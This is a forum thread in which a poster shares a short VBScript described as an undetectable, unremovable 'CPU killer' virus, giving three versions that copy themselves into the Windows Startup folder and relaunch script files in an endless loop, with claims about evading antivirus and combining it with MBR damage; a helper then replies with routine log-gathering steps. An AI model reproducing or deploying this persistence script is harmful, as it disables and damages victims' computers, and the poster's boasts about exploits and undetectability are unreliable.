Undetecable and unremoveable 1kb virus

Win9x

Recommended Posts

The virus is hidden. When you click a shortcut in rar it's undetecable. Also you can't remove that. Malwarebytes didn't found them virus.

do
CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("file1.vbs")
Set objShell = Nothing
loop

Here is the code. The virus get detected by some antiviruses with false positive results. It's not Trojan. It's CPU killer. Also with more codes it's become unbeatable. Also if you run with this virus with MBR it's become horrible.

do
CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("file1.vbs")
Set objShell = Nothing
CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("file1.vbs")
Set objShell = Nothing
CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("file1.vbs")
Set objShell = Nothing
loop

When you run this virus with this command at .vbs file. It's unbeatable except you run PC from safe mode. If you try delete it then he creates himself. It uses exploit. Also if this virus doesn't allow the change file then it becomes more dangerous. If you change some codes antivirus maybe can't detect it. So you must be flag this code as exploit.

CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("filename.vbs")
Set objShell = Nothing

Which is pretty short code. Just only 5. That's going to create some false positive results but otherwise this virus can't detectable. If you restart the system then this virus runs again and kill your PC.

Hello @Win9x and :welcome::

While you are waiting for the next qualified/approved malware removal expert helper to weigh in on your topic, and even though you may have run the following Malwarebytes utility, or its subsets, please carefully follow these instructions:

  1. Download the Malwarebytes Support Tool.
  2. In your Downloads folder, open the mb-support-x.x.x.xxx.exe file.
  3. In the User Account Control (UAC) pop-up window, click Yes to continue the installation.
  4. Run the MBST Support Tool.
  5. In the left navigation pane of the Malwarebytes Support Tool, click Advanced.
  6. In the Advanced Options, click only Gather Logs. A status diagram displays the tool is Getting logs from your computer.
  7. A zip file named mbst-grab-results.zip will be saved to the Public desktop, please attach that file in your next reply to this topic. Please do NOT copy and paste.

For the short time between when you post the diagnostic logs, and when your helper weighs in, please take no further self-directed remedial actions that will invalidate the diagnostic logs you will have sent.

Thank you.
